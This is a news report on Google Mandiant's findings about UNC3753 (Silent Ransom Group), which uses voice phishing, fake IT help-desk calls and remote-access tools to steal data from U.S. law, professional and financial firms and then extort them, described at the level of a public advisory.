Cybersecurity experts have revealed details of a financially driven data theft and extortion operation that has hit dozens of organizations in the U.S. across professional, legal, and financial services sectors between January and May 2026.
Google Mandiant and Google Threat Intelligence Group (GTIG) have linked this activity to a threat actor known as UNC3753, also referred to as Chatty Spider, Luna Moth, and Silent Ransom Group (SRG).
“UNC3753 uses voice phishing (vishing) and social engineering tricks to gain remote access into corporate networks,” explained researchers Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, and Tyler McLellan.
“By using pretexts like data migration or invoice-related emails, the attackers start phone calls pretending to be IT support and persuade targets to join screen-sharing sessions and install remote monitoring and management (RMM) tools.”
After gaining access, the attackers either directly search for and steal files of interest or trick the victim into doing it themselves. Stolen data includes confidential legal agreements, personally identifiable information (PII), and financial records.
In some cases, the attackers have physically visited victims’ offices, following a warning issued by the U.S. Federal Bureau of Investigation (FBI) last month. These in-person intrusions involve the attackers posing as IT technicians to enter corporate offices and try to steal data using removable USB drives.
“By sending someone in person to the victim’s location to help with the intrusion, SRG actors copy data to an external hard drive or USB drive plugged into the victim’s computer by the attacker,” the FBI noted regarding this new escalation in UNC3753’s tactics.
Google stated that UNC3753 shares tactical similarities with UNC2686, a threat group previously known for running BazarCall-style campaigns in 2021. While the group has been seen deploying LockBit Black ransomware before, it has primarily focused on extortion-only operations since 2022, pressuring victims to pay or risk having their data published on the LEAKEDDATA leak site.
Both UNC3753 and UNC2686 are believed to be offshoots of the now-defunct Conti ransomware gang, with early versions of the campaigns using subscription cancellation lures as part of callback phishing attacks designed to install remote access software on victims’ machines.
Starting around March 2025, the hacking group has impersonated internal corporate IT help desk staff to deceive victims into joining a screen-sharing session on enterprise communication platforms like Zoom, Microsoft Teams, or Quick Assist, claiming to address a security issue or assist with a corporate data migration project, effectively bypassing traditional security measures.
“The threat group often starts campaigns using harmless, invoice-themed email lures sent from attacker-controlled consumer email accounts,” Google explained. “These emails contain no active links or malicious attachments. Instead, they usually include a brief, generic message. The main goal of these emails is to set up a pretext, raising the target’s internal security concerns so they are more likely to respond to follow-up voice calls.”
Once a session is set up, the attackers try to maintain a persistent presence by guiding victims to install legitimate remote desktop software like AnyDesk, Bomgar, SuperOps RMM, or Zoho Assist. Instructions to install these programs are shared through a legitimate service called “privnote[.]com,” which allows users to send notes that self-destruct after being read by the recipient.
UNC3753 has also been observed setting up Zoom sessions directly on targets’ personal laptops to access corporate virtual desktop infrastructure (VDI) and dig deeper into corporate file systems, aiming to enumerate local and cloud directories, scan mapped network drives, and collect data from highly sensitive folders, including those related to tax filings, audits, corporate client agreements, and Social Security numbers (SSNs).
In the final stage, the stolen data is sent to the attackers via WinSCP or Rclone, or to email addresses controlled by the attacker from the target’s mailbox. This is followed by the attackers sending an extortion demand via email, typically within 30 minutes of leaving the target environment.
The emails give victims a three-day deadline to start ransom negotiations. They also threaten to call and email target employees and external clients directly to inform them of the data breach if they do not respond, in addition to publishing all stolen information on the data leak site.
In many incidents investigated by Google’s threat intelligence and incident response teams, the entire operation from initial contact to data extortion is said to have taken place within a single business day. The fast-paced operational model is highlighted by the fact that the attackers begin data searches, staging, and theft in under an hour.
“Legal services firms are high-value targets for extortion actors. They hold concentrated collections of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports,” Google noted.
“Threat groups understand that legal entities face significant reputational and regulatory risks and may be highly motivated to resolve extortion situations quietly to protect their professional reputation. Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—allows them to easily bypass strong technical defenses, web security gateways, and MFA configurations.”
